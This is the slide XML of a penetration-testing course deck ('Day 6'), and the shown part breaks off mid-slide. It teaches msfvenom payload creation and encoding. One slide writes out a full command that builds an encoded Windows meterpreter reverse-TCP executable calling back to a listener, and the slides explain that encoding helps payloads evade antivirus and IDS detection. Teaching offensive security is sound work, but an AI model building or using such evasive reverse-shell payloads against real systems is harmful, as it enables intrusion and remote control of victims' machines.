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Inconsolata" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId23"/>
      <p:bold r:id="rId24"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId25"/>
      <p:bold r:id="rId26"/>
      <p:italic r:id="rId27"/>
      <p:boldItalic r:id="rId28"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId29"/>
      <p:bold r:id="rId30"/>
      <p:italic r:id="rId31"/>
      <p:boldItalic r:id="rId32"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId33"/>
      <p:bold r:id="rId34"/>
      <p:italic r:id="rId35"/>
      <p:boldItalic r:id="rId36"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin"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88">
          <p15:clr>
            <a:srgbClr val="9AA0A6"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="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252" y="126"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="426"/>
        <p:guide pos="288"/>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777160c064_2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777160c064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shutterstock_1678719676</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777160c064_0_1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777160c064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7768e3048f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7768e3048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7768e3048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7768e3048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7768e3048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7768e3048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7768e3048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7768e3048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777160c064_0_1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777160c064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7768e3048f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7768e3048f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g777160c064_2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4" name="Google Shape;2204;g777160c064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777160c064_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777160c064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751df9d789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751df9d789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777160c064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777160c06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shutterstock_792833623</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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2068" name="Google Shape;2068;g777160c0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9" name="Google Shape;2069;g777160c0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7768e3048f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7768e3048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7768e3048f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7768e3048f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768e304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768e304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7768e3048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7768e3048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777160c064_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777160c064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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2026" name="Google Shape;2026;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7" name="Google Shape;2027;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8" name="Google Shape;2028;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9" name="Google Shape;2029;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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2031" name="Google Shape;203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2" name="Google Shape;2032;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8.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hyperlink" Target="https://dribbble.com/shots/11181725-Hacker-from-a-backdoo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hyperlink" Target="https://dribbble.com/shots/8521877-Malware-Scanner-CSS-Animation/attachments/805128?mode=medi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0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Penetration Testing Day 6 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2038" name="Google Shape;2038;p10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Custom Payloads with msfvenom</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2039" name="Google Shape;2039;p1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pic>
        <p:nvPicPr>
          <p:cNvPr id="2126" name="Google Shape;2126;p115"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="0"/>
            <a:ext cx="9168602" cy="5158160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2127" name="Google Shape;2127;p115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="2796450"/>
            <a:ext cx="4393800" cy="869100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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a:solidFill>
                  <a:srgbClr val="7FD6FA"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>This change in signature allows payloads </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="7FD6FA"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="7FD6FA"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>to bypass detection from AV and IDS tools that detect known malicious signatures.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="7FD6FA"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2128" name="Google Shape;2128;p115"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274375" y="640080"/>
            <a:ext cx="8604300" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2129" name="Google Shape;2129;p115"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="4906455"/>
            <a:ext cx="8595600" cy="10200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2130" name="Google Shape;2130;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Msfvenom Encoding</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2131" name="Google Shape;2131;p115"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="8810700" cy="1035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rgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is a method used to change the signature of an exploit or payload, creating a new signature that does not yet have a written rule.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2132" name="Google Shape;2132;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10</a:t>
            </a:fld>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2133" name="Google Shape;2133;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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2138" name="Google Shape;2138;p116"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2139" name="Google Shape;2139;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11</a:t>
            </a:fld>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2140" name="Google Shape;2140;p116"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3610750" y="1099675"/>
            <a:ext cx="4627500" cy="3440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2CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Now we’ll walk through the basics of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>s help menu and some basic command options for use with encoders, payloads, and formats.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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11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Custom Payloads with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2146" name="Google Shape;2146;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4292E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 2150"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2151" name="Google Shape;2151;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Msfvenom Syntax</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2152" name="Google Shape;2152;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13</a:t>
            </a:fld>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2153" name="Google Shape;2153;p118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="194550" y="2493088"/>
            <a:ext cx="8754900" cy="655500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10369"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="91425" rIns="0" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>msfvenom -p windows/meterpreter/reverse_tcp -a x86 -e x86/shikata_ga_nai -f exe -o /tmp/hack.exe LHOST=192.168.0.8 LPORT=4444</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2154" name="Google Shape;2154;p118"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="343550" y="1157550"/>
            <a:ext cx="1038300" cy="738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rgbClr val="FF00FF"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>launches the MSFvenom program.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2155" name="Google Shape;2155;p118"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="939650" y="3455800"/>
            <a:ext cx="1038300" cy="738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5"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent5"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>indicates payload.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2156" name="Google Shape;2156;p118"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1377525" y="1673950"/>
            <a:ext cx="2785500" cy="361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rgbClr val="FF00FF"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>windows/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>is the Metasploit command module.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2157" name="Google Shape;2157;p118"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3091100" y="3455800"/>
            <a:ext cx="1038300" cy="738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5"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>-a x86</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent5"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>designates the architecture we will use. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>x86</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> is default.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2158" name="Google Shape;2158;p118"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4028200" y="893675"/>
            <a:ext cx="1967700" cy="59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rgbClr val="FF00FF"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>-e x86/shikata_ga_nai</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>designates the encoder we will use.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2159" name="Google Shape;2159;p118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="2111175" y="1334775"/>
            <a:ext cx="195600" cy="1967700"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>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18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="983300" y="3164750"/>
            <a:ext cx="195600" cy="282900"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="7FD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161" name="Google Shape;2161;p118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="543800" y="2020575"/>
            <a:ext cx="195600" cy="596100"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>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18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3433925" y="3092150"/>
            <a:ext cx="195600" cy="428100"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="7FD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163" name="Google Shape;2163;p118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="4342900" y="1677075"/>
            <a:ext cx="195600" cy="1283100"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5182600" y="3455800"/>
            <a:ext cx="1038300" cy="738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chemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>-f exe </a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>indicates the file type to create. In this case, .exe.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2165" name="Google Shape;2165;p118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5373950" y="3116000"/>
            <a:ext cx="195600" cy="380400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="7FD6F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166" name="Google Shape;2166;p118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="6194625" y="1833675"/>
            <a:ext cx="195600" cy="969900"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6095563" y="1297788"/>
            <a:ext cx="2512200" cy="594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a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>-o /tmp/malware.exe</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
